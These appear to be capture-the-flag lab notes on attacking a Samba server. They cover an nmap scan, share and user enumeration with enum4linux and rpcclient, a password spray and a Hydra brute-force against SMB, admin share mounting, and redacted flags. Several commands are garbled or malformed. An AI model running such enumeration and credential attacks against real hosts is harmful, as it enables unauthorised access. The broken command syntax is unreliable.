Recon Samba
IP
Kali IP: 192.102.128.2
Target IP: 192.102.128.3
Nmap
$ nmap -sC -Sv -oN nmap.txt
Workgroup: RECONLABS
Found vulnerability within SMB
SMB_enumshares Metasploit
Results: public john aisha emma everyone (DISK) IPC (samba.recon.alb)
enum4linux
$ enum4Linux -v 192.102.128.3
Users: administrator, guest, domain admins, root, bin, none
-U to see usernames -G groups -S shares
rpcclient
$ rpcclient -U "" -N 192.102.128.3
Users: john 0x3ee elie 0x3ea aisha 0x3ec shawn 0x3e9 emma 0x3eb admin 0x3ed
$ for u in âcat domain-users.txtâ; do echo -n â[*] user: $uâ && rpcclient -U $â$u%Autumn2015â -c âgetusername;quitâ 192.102.128.3
Hydra
$ hydra -L users.txt -P /usr/share/john/password.lst 192.102.128.3 smb
SMB
$ smbmount //192.102.128.3/ /mnt âo username=admin,workgroup=RECONLABS \samba-recon-admin
$ mount -t cifs -o username=admin //192.102.128.3/admin /mnt mount -t cifs -o username=smbuser,password=smbpass //192.168.1.100/documents /mnt samba-recon\admin\profile
$ smbclient -U "admin%password" \\\\192.102.128.3\\admin
Flags
a11##############5bf7
16b##############a6d0
2727##########721c92e
03ddb############b3b4
Last updated